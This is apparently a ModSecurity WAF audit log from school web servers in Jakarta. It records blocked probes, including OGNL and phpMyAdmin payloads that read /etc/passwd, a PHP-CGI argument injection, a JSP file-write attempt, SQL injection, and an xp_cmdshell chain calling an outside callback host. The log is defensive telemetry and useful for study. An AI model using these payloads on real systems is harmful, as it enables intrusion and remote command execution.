https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 183.88.240.63 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 183.88.240.63 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --3ea89e6e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3ea89e6e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747942793839484 2846 (- - -) Stopwatch2: 1747942793839484 2846; combined=1225, p1=421, p2=773, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3ea89e6e-Z-- --463ebc16-A-- [23/May/2025:02:46:59 +0700] aC9_Myektx75wRFPQygHggAAAMQ 103.236.140.4 33748 103.236.140.4 8181 --463ebc16-B-- GET /.env HTTP/1.0 Host: vinic.twilightparadox.com X-Real-IP: 167.99.181.249 X-Forwarded-Host: vinic.twilightparadox.com X-Forwarded-Server: vinic.twilightparadox.com X-Forwarded-For: 167.99.181.249 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --463ebc16-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --463ebc16-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747943219477720 849 (- - -) Stopwatch2: 1747943219477720 849; combined=316, p1=282, p2=0, p3=0, p4=0, p5=34, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --463ebc16-Z-- --ffb4a859-A-- [23/May/2025:02:51:10 +0700] aC-ALuThJmFSRJ5-OZfqVQAAAE4 103.236.140.4 33796 103.236.140.4 8181 --ffb4a859-B-- POST /login.action HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 596 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15 Accept: */* Accept-Language: en Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166344619 --ffb4a859-C-- username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D --ffb4a859-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ffb4a859-E-- --ffb4a859-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /login.action"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747943470027522 2831 (- - -) Stopwatch2: 1747943470027522 2831; combined=589, p1=408, p2=154, p3=0, p4=0, p5=26, sr=69, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ffb4a859-Z-- --b8dfff2c-A-- [23/May/2025:02:51:10 +0700] aC-ALiektx75wRFPQygHjAAAAMU 103.236.140.4 33814 103.236.140.4 8181 --b8dfff2c-B-- POST /scripts/setup.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 80 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686; rv:128.0) Gecko/20100101 Firefox/128.0 Accept: */* Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635402 --b8dfff2c-C-- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} --b8dfff2c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b8dfff2c-E-- --b8dfff2c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /scripts/setup.php"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747943470855916 1759 (- - -) Stopwatch2: 1747943470855916 1759; combined=545, p1=396, p2=122, p3=0, p4=0, p5=27, sr=70, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b8dfff2c-Z-- --e252816d-A-- [23/May/2025:03:04:18 +0700] aC-DQn0O04WKE1HJ5iR7zQAAAAo 103.236.140.4 33876 103.236.140.4 8181 --e252816d-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3D0+%ADd+disable_functions%3D%22%22+%ADd+allow_url_include%3D1+%ADd+auto_prepend_file%3Dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 176.65.138.171 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 176.65.138.171 X-Forwarded-Proto: https Connection: close Content-Length: 110 User-Agent: python-requests/2.32.3 Accept: */* --e252816d-C-- --e252816d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e252816d-E-- --e252816d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd cgi.force_redirect=0 \xadd disable_functions="" \xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd cgi.force_redirect=0 \x5cxadd disable_functions=\x22\x22 \x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd cgi.force_redirect=0 \xadd disable_functions=\x22\x22 \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747944258330438 3913 (- - -) Stopwatch2: 1747944258330438 3913; combined=2165, p1=502, p2=1628, p3=0, p4=0, p5=35, sr=83, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e252816d-Z-- --43ab087d-A-- [23/May/2025:03:10:27 +0700] aC-Esyektx75wRFPQygHkAAAANM 103.236.140.4 33958 103.236.140.4 8181 --43ab087d-B-- POST /uapjs/jsinvoke/?action=invoke HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 45.32.66.146 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 232 User-Agent: Mozilla/5.0 (Knoppix; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded;charset=UTF-8 X-Forwarded-For: 45.32.66.146 Cookie: X-Varnish: 166635444 --43ab087d-C-- {"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig", "parameterTypes":["java.lang.Object","java.lang.String"], "parameters":["2xQufSTMaLU89DHV7ltwT0oEEdB","webapps/nc_web/2xQufVuSBmIOFfRHwv6uZZxNqPA.jsp"]} --43ab087d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --43ab087d-E-- --43ab087d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(\\n|\\r)" at ARGS_NAMES:{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig",\r\n"parameterTypes":["java.lang.Object","java.lang.String"],\r\n"parameters":["2xQufSTMaLU89DHV7ltwT0oEEdB","webapps/nc_web/2xQufVuSBmIOFfRHwv6uZZxNqPA.jsp"]}. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "145"] [id "217291"] [rev "2"] [msg "HTTP Header Injection Attack via payload (CR/LF detected)||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: \x0d found within ARGS_NAMES:{\x22serviceName\x22:\x22nc.itf.iufo.IBaseSPService\x22,\x22methodName\x22:\x22saveXStreamConfig\x22,\x5cr\x5cn\x22parameterTypes\x22:[\x22java.lang.Object\x22,\x22java.lang.String\x22],\x5cr\x5cn\x22parameters\x22:[\x222xQufSTMaLU89DHV7ltwT0oEEdB\x22,\x22webapps/nc_web/2xQufVuSBmIOFfRHwv6uZZxNqPA.jsp\x22]}: {\x22serviceName\x22:\x22nc.itf.iufo.IBaseSPService\x22,\x22methodName\x22:\x22saveXStreamConfig\x22,\x0d\x0a\x22parameterTypes\x22: Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747944627292578 4682 (- - -) Stopwatch2: 1747944627292578 4682; combined=2711, p1=506, p2=2173, p3=0, p4=0, p5=32, sr=84, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43ab087d-Z-- --4533a62d-A-- [23/May/2025:03:11:40 +0700] aC-E_GfriXjg62qQwE9tJQAAAIQ 103.236.140.4 33984 103.236.140.4 8181 --4533a62d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 97.74.83.219 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 97.74.83.219 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --4533a62d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4533a62d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747944700105805 3693 (- - -) Stopwatch2: 1747944700105805 3693; combined=1756, p1=838, p2=885, p3=0, p4=0, p5=32, sr=386, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4533a62d-Z-- --a677233f-A-- [23/May/2025:03:17:07 +0700] aC-GQ2friXjg62qQwE9tOAAAAIk 103.236.140.4 34066 103.236.140.4 8181 --a677233f-B-- GET /cslu/v1/var/logs/customer-cslu-lib-log.log HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Kubuntu; Linux i686; rv:126.0) Gecko/20100101 Firefox/126.0 Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 166344685 --a677233f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --a677233f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".log"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747945027143341 2158 (- - -) Stopwatch2: 1747945027143341 2158; combined=747, p1=355, p2=365, p3=0, p4=0, p5=27, sr=84, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a677233f-Z-- --2c1e7554-A-- [23/May/2025:03:27:05 +0700] aC-ImW_WNRyhaqaKDLwgWgAAAMU 103.236.140.4 34342 103.236.140.4 8181 --2c1e7554-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 196.117.254.121 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 196.117.254.121 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --2c1e7554-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c1e7554-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747945625800349 1073 (- - -) Stopwatch2: 1747945625800349 1073; combined=348, p1=311, p2=0, p3=0, p4=0, p5=37, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c1e7554-Z-- --ab662f4f-A-- [23/May/2025:03:47:20 +0700] aC-NWLz70bfNdlplZZOxLgAAAFQ 103.236.140.4 34418 103.236.140.4 8181 --ab662f4f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 46.231.79.62 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 46.231.79.62 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ab662f4f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab662f4f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747946840352494 3594 (- - -) Stopwatch2: 1747946840352494 3594; combined=1550, p1=555, p2=964, p3=0, p4=0, p5=31, sr=137, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ab662f4f-Z-- --00c89c1b-A-- [23/May/2025:03:58:27 +0700] aC-P8x67_KloOut96EndIAAAAJE 103.236.140.4 34510 103.236.140.4 8181 --00c89c1b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 124.217.254.215 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 124.217.254.215 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --00c89c1b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --00c89c1b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747947507906649 2842 (- - -) Stopwatch2: 1747947507906649 2842; combined=1276, p1=422, p2=824, p3=0, p4=0, p5=29, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00c89c1b-Z-- --3a1fa900-A-- [23/May/2025:04:01:53 +0700] aC-Qwbz70bfNdlplZZOxOQAAAFI 103.236.140.4 34596 103.236.140.4 8181 --3a1fa900-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 159431781 --3a1fa900-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --3a1fa900-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3a1fa900-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747947713353167 2695 (- - -) Stopwatch2: 1747947713353167 2695; combined=1503, p1=356, p2=1122, p3=0, p4=0, p5=25, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3a1fa900-Z-- --560ed264-A-- [23/May/2025:04:05:26 +0700] aC-RllYzwfxII7zMfyHb-QAAAAw 103.236.140.4 34618 103.236.140.4 8181 --560ed264-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 148.113.181.253 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 148.113.181.253 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --560ed264-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --560ed264-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747947926849989 3054 (- - -) Stopwatch2: 1747947926849989 3054; combined=1317, p1=458, p2=831, p3=0, p4=0, p5=28, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --560ed264-Z-- --2aa42a5e-A-- [23/May/2025:04:27:39 +0700] aC-Wy1YzwfxII7zMfyHcAgAAAAQ 103.236.140.4 34706 103.236.140.4 8181 --2aa42a5e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --2aa42a5e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2aa42a5e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747949259456268 830 (- - -) Stopwatch2: 1747949259456268 830; combined=304, p1=268, p2=0, p3=0, p4=0, p5=36, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2aa42a5e-Z-- --75813218-A-- [23/May/2025:04:28:53 +0700] aC-XFR67_KloOut96EndQAAAAJA 103.236.140.4 34742 103.236.140.4 8181 --75813218-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 143.110.213.72 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 143.110.213.72 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --75813218-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --75813218-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747949333588039 866 (- - -) Stopwatch2: 1747949333588039 866; combined=331, p1=295, p2=0, p3=0, p4=0, p5=36, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --75813218-Z-- --b6f84967-A-- [23/May/2025:04:37:05 +0700] aC-ZAVYzwfxII7zMfyHcIAAAAAY 103.236.140.4 34792 103.236.140.4 8181 --b6f84967-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 774 User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36 Content-Type: application/soap+xml X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 162993634 --b6f84967-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0mbkqa4kqtm561jt3n08pq14hqyejy4w.oast.fun'-- --b6f84967-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --b6f84967-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] 